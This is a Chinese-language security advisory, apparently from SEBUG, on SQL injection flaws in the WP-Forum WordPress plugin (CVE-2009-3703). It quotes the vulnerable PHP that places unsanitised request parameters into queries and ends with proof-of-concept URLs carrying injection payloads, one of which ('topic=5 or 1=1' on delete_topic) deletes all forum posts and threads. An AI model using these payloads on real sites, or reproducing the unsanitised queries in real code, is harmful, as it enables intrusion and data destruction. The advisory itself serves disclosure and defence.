WordPress WP-Forum插件多个SQL注入漏洞
SSV ID:15131SEBUG-Appdir:WordPress
发布时间:2009-12-16
影响版本:
Fredrik Fahlstad WP-Forum <= 2.3漏洞描述:
BUGTRAQID: 37357
CVE ID: CVE-2009-3703
WP-Forum是一款基于PHP的WordPress插件。
WP-Forum的wpf.class.php页面没有正确地过滤用户所提交的forum、topic和search_max参数,以及在 editpost或viewtopic操作中所提交的id参数,远程攻击者可以通过提交恶意参数请求执行SQL注入攻击。以下是有漏洞的代码段:
wpf.class文件
1836 $option_max_days = $_POST[’search_max’]; // <- this line is not being sanitized
1837 $option_forums = $_POST[’forum’];
1838 if(!$option_max_days)
1839 $option_max_days = 9999;
1840 $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(),
INTERVAL $option_max_days DAY) ";
1841
...
1850 foreach((array)$option_forums as $f)
1851 $a .= $f.","; // <- <- this lines is not being sanitized
1852
1853 $a = substr($a, 0, strlen($a)-1 );
1854 if(!$a)
1855 $w = "";
1856 else
1857 $w = "IN($a)";
1858
1859 $sql = "SELECT $this->t_threads.parent_id as pt,
$this->t_posts.id, text, $this->t_posts.subject,
$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST
(’$search_string’) AS score
1860 FROM $this->t_posts inner join $this->t_threads on
$this->t_posts.parent_id = $this->t_threads.id
1861 WHERE $this->t_threads.parent_id$w
1862 AND MATCH (text) AGAINST (’$search_string’) $op";
在wpf-post.php文件中:
57 $id = $_GET[’id’]; // <- $_GET[’id’] is directly assigned
58 $thread = $this->check_parms($_GET[’t’]);
59
60 $out .= $this->header();
61
62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE
id = $id"); // <- id is used without clean up
其他示例:
1490 function remove_post(){
1491 global $user_level, $user_ID, $wpdb;
1492 $id = $_GET[’id’]; // <- $_GET[’id’] is directly assigned
1493 $author = $wpdb->get_var("SELECT author_id from
$this->t_posts where id = $id"); // id is used without clean up
...
1503 if($del == "ok"){
1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id
= $id"); <- // id is used without clean up
1505 $this->o .= "<div class=’updated’>".__("Post
deleted", "wpforum")."</div>";
1506 }
1507 else
1508 wp_die(__("Cheating, are we?", "wpforum"));
1509
1510 }
此外由于没有正确的过滤$_GET[’topic’],还可以清除$this->t_posts和$this->t_threads表格中的所有记录:
1479 function remove_topic(){
1480 global $user_level, $user_ID, $wpdb;
1481 $topic = $_GET[’topic’];
1482 if($this->is_moderator($user_ID, $this->current_forum)){
1483 $wpdb->query("DELETE FROM $this->t_posts WHERE
parent_id = $topic");
1484 $wpdb->query("DELETE FROM $this->t_threads WHERE
id = $topic");
1485 }
1486 else
1487 wp_die(__("Cheating, are we?", "wpforum"));
1488
1489 }<*参考
Juan Galiana Lara (jgaliana@isecauditors.com)
链接:http://secunia.com/advisories/37794/
http://marc.info/?l=bugtraq&m=126098010402950&w=2
*>
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0
http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1
http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0
http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1SEBUG安全建议:
厂商补丁:
Fredrik Fahlstad
页:
[1]